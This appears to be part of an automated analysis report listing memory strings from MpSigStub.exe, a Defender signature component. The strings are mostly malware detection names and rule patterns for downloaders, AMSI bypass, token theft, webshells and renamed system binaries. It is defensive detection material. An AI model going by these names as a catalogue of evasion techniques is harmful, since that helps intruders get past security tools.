Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %s%s!
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: :longfolder
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:trojan:script/userexecution.a!amsi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:trojan:script/userexecution.a!amsiobmpattributes
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 48db3ab350cd5
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 1d5b3942ec61c
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: susptool_
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:colisicomponent
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: appdatafr3.bin
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 15b362aecaba
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: db78cc5e9b0b
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hstr:adware:win32/lollipop_check_arg
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %hstr:adware:win32/lollipop_check_arg
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dbb38de769be
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#context:softwarebundler:win32/installmonster.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (.+)%(.%).exe$
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (.+).exe$
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 4cb382521bf6
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \\.\pipe\local\chrome.nativemessaging
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &\\.\pipe\local\chrome.nativemessaging
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \\.\pipe\mpvsocket
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \clickonceforgooglechrome.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \evolvecontactagent.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:contextdataprocessname2
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:contextdataprocessname2obmpattributes
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:openfilecontextdatapresent
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:openfilecontextdata:procname!
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "lua:openfilecontextdata:procname!
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:openfileforcreatingprocess
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:openfilecontextdata:filename!
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "lua:openfilecontextdata:filename!
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 7378b0f18dd3
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:autoitcustomlastsec
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#jenxcusbase64deobfuscator
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#jenxcusbase64deobfuscatorobmpattributes
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "[a-za-z0-9%+/][a-za-z0-9%+/]=(=?)(..-)[a-za-z0-9%+/][a-za-z0-9%+/]=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e"[a-za-z0-9%+/][a-za-z0-9%+/]=(=?)(..-)[a-za-z0-9%+/][a-za-z0-9%+/]=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: [jxs64]
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:win32/gatak.eg!dha
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \appdata\roaming\microsoft\windows\start menu\programs\startup
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ?\appdata\roaming\microsoft\windows\start menu\programs\startup
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \%d+%.exe$
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: aa785fa688b6
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: cmd /c tas
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 95b39109a48a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:cobmetloader.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:cobmetloader.aobmpattributes
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:contextpeadminshare.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lua:contextpeadminshare.a1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 69b3eccf1b7a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &z~5
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slfper:trojan:powershell/psobfuscateddownloader.c
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 3p!#slfper:trojan:powershell/psobfuscateddownloader.c
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: o!#aggr:dridexdllnames
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:unnamedeccparams
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: n!#tel:unnamedeccparams
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:genericinstallerfile
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: i!#aggr:genericinstallerfile
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_at:aadaccesstoken_utils
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: h!#bm_at:aadaccesstoken_utils
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:kcrc:trojan:msil/adobal
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: g!#tel:kcrc:trojan:msil/adobal
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:win32/suspxl4exec.aj!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f!#slf:win32/suspxl4exec.aj!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:suspiciousautoitexeinusb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e!#aggr:suspiciousautoitexeinusb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_csrss.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e!#bm_copyrenamediname_csrss.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamedoname_csrss.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e!#bm_copyrenamedoname_csrss.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#alf:trojan:win32/cassini.a!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#alf:trojan:win32/cassini.b!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!cmstp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!cmstp.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!msxsl.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!msxsl.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!netsh.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!netsh.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!notes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!notes.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!print.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!print.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:copyrenamed!vmmap.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d!#slf:aggr:copyrenamed!vmmap.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/obfuse.xsxg!lnk
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "b!#alf:trojan:win32/obfuse.xsxg!lnk
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:exploit:script/makeshift.a!dha
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $`!#alf:exploit:script/makeshift.a!dha
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojanspy:msil/formbook.rbf!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %_!#alf:trojanspy:msil/formbook.rbf!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#script:adware:html/seoframe.a!lowfi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: %_!#script:adware:html/seoframe.a!lowfi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/cassini_2b8f5083!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ']!#alf:trojan:win32/cassini_2b8f5083!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:aggr:suspamsiwmieventsubsription.b
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (\!#slf:aggr:suspamsiwmieventsubsription.b
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:trojan:powershell/amsiscanbypass.c
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (\!#slf:trojan:powershell/amsiscanbypass.c
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:hacktool:powershell/internaloff.c1!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ,x!#slf:hacktool:powershell/internaloff.c1!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: -w!#blkacc:d4f940ab-401b-4efc-aadc-ad5f3c50688a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:o97m/excelobjectxllpluginabuse.b
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: -w!#tel:trojan:o97m/excelobjectxllpluginabuse.b
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:aggr:siga:msil/suspicious.send.screencap.s1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 1s!#alf:aggr:siga:msil/suspicious.send.screencap.s1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#agg:nivdort.cq1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: t!#agg:nivdort.cq1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:suspfileinwinmail.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: h!#slf:suspfileinwinmail.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:nullsoft:windowsdiscount
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: g!#alf:nullsoft:windowsdiscount
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:trojan:msil/injgen.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f!#aggr:trojan:msil/injgen.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e!#alf:trojan:win32/cassini.a!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lowfitrojan:js/seedabutor.c_02
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: e!#lowfitrojan:js/seedabutor.c_02
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:js/faceliker!eventlistener
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !d!#aggr:js/faceliker!eventlistener
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:powershell/bypassamsi.a!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !d!#alf:powershell/bypassamsi.a!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:html/fakealert.ar!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "c!#alf:trojan:html/fakealert.ar!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojanspy:vbs/mekotio.mk!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "c!#alf:trojanspy:vbs/mekotio.mk!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:trojanclicker:js/faceliker_6
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "c!#slf:trojanclicker:js/faceliker_6
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:trojanclicker:js/faceliker_7
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "c!#slf:trojanclicker:js/faceliker_7
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: #b!#alf:backdoor:js/potentialwebshell
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/cassini_56a3061!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &_!#alf:trojan:win32/cassini_56a3061!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#scpt:trojandownloader:vbs/adodb!owse
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &_!#scpt:trojandownloader:vbs/adodb!owse
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:exploit:o97m/ddedownloader.v!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &_!#tel:exploit:o97m/ddedownloader.v!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:powershell/hiddien.a!attk
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &_!#tel:trojan:powershell/hiddien.a!attk
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#do_exhaustivehstr_rescan_nivdort_cd1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &_!#do_exhaustivehstr_rescan_nivdort_cd1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/cassini_2c94ada9!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: '^!#alf:trojan:win32/cassini_2c94ada9!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:newpeinternalnamedifffromfilename
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (]!#aggr:newpeinternalnamedifffromfilename
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:newpeoriginalnamedifffromfilename
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (]!#aggr:newpeoriginalnamedifffromfilename
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#lua:macro:o97m/macrocreatthread.a!amsi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: (]!#lua:macro:o97m/macrocreatthread.a!amsi
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:powershell:general.checklist.s1001
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: )\!#aggr:powershell:general.checklist.s1001
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojandownloader:o97m/encdoc.tda!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: *[!#alf:trojandownloader:o97m/encdoc.tda!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojandownloader:o97m/encdoc.got!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: *[!#tel:trojandownloader:o97m/encdoc.got!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojandownloader:o97m/qakbot.smtt!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: +z!#tel:trojandownloader:o97m/qakbot.smtt!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojandownloader:powershell/mpexclusionbypass
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 3r!#alf:trojandownloader:powershell/mpexclusionbypass
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:htaexecfromdwn.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: p!#alf:htaexecfromdwn.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:capturescreenshot.rm
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: l!#alf:capturescreenshot.rm
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#//aggr:horsewdocstrings.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: k!#//aggr:horsewdocstrings.a
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#slf:win32/suspxl4exec.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: i!#slf:win32/suspxl4exec.j!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:scpt:trojan:html/phish.al
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: g!#alf:scpt:trojan:html/phish.al
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#aggr:powershell/encodedcommand
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f!#aggr:powershell/encodedcommand
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: f!#alf:trojan:win32/cassini.a!ibt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#aggr:js/faceliker!eventlistener
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_control.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_control.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_cscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_cscript.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_dbgview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_dbgview.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_diskext.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_diskext.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_findstr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_findstr.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_hex2dec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_hex2dec.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_ldmdump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_ldmdump.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_loadord.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !e!#bm_copyrenamediname_loadord.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#bm_copyrenamediname_makecab.exe
